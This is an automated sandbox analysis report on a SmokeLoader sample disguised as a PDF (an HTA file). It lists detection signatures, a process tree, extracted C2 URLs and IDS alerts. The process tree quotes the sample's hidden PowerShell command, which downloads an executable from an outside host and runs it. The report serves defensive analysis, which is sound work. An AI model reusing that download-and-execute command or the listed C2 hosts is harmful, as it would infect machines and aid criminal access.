Edit tour
Windows
Analysis Report
3388.PDF.hta
Overview
General Information
Sample name: | 3388.PDF.htarenamed because original name is a hash value |
Original sample name: | _011024_i_01_10_2024___UA973248410000000026006263388.PDF.hta |
Analysis ID: | 1524029 |
MD5: | 35ef7b98b8eabb06a41f4b0cecace704 |
SHA1: | 5668a7317fb91f8be783ff93289dad41d5ea6108 |
SHA256: | c40dff83b1bb399b942ba22b7d03be530e35a04d9e0862789efada5896cd7eb6 |
Infos: | |
Detection
SmokeLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to download and execute files (via powershell)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- mshta.exe (PID: 3564 cmdline:
mshta.exe "C:\Users\ user\Deskt op\3388.PD F.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A) - powershell.exe (PID: 3612 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -NoProfile -WindowSt yle Hidden -Command "$path = $ Env:temp + '\EkXH.ex e'; $clien t = New-Ob ject Syste m.Net.WebC lient; $cl ient.downl oadfile('h ttp://ukr- net-filesr ever.pw/do wnload/svc .exe',$pat h); Start- Process -F ilePath $p ath" MD5: EB32C070E658937AA9FA9F3AE629B2B8) - EkXH.exe (PID: 3824 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\EkXH.e xe" MD5: 31059E7394B880F017E83804D9B716AB) - explorer.exe (PID: 1244 cmdline:
C:\Windows \Explorer. EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
- taskeng.exe (PID: 3956 cmdline:
taskeng.ex e {A18241F A-0367-40E 9-BBC3-15C E4DAD052A} S-1-5-21- 966771315- 3019405637 -367336477 -1006:user -PC\user:I nteractive :[1] MD5: 65EA57712340C09B1B0C427B4848AE05) - vgjfftu (PID: 3988 cmdline:
C:\Users\u ser\AppDat a\Roaming\ vgjfftu MD5: 31059E7394B880F017E83804D9B716AB)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| |
Windows_Trojan_Smokeloader_3687686f | unknown | unknown |
| |
Windows_Trojan_Smokeloader_3687686f | unknown | unknown |
| |
Click to see the 7 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-02T12:25:57.550656+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.22 | 49162 | 185.219.7.204 | 80 | TCP |
2024-10-02T12:27:08.805485+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.22 | 49163 | 185.219.7.204 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-02T12:25:20.716931+0200 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49161 | 185.219.7.204 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Domain query: | |||
Source: | Domain query: | |||
Source: | Domain query: | |||
Source: | Domain query: | |||
Source: | Network Connect: | Jump to behavior |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | HTTP traffic detected: |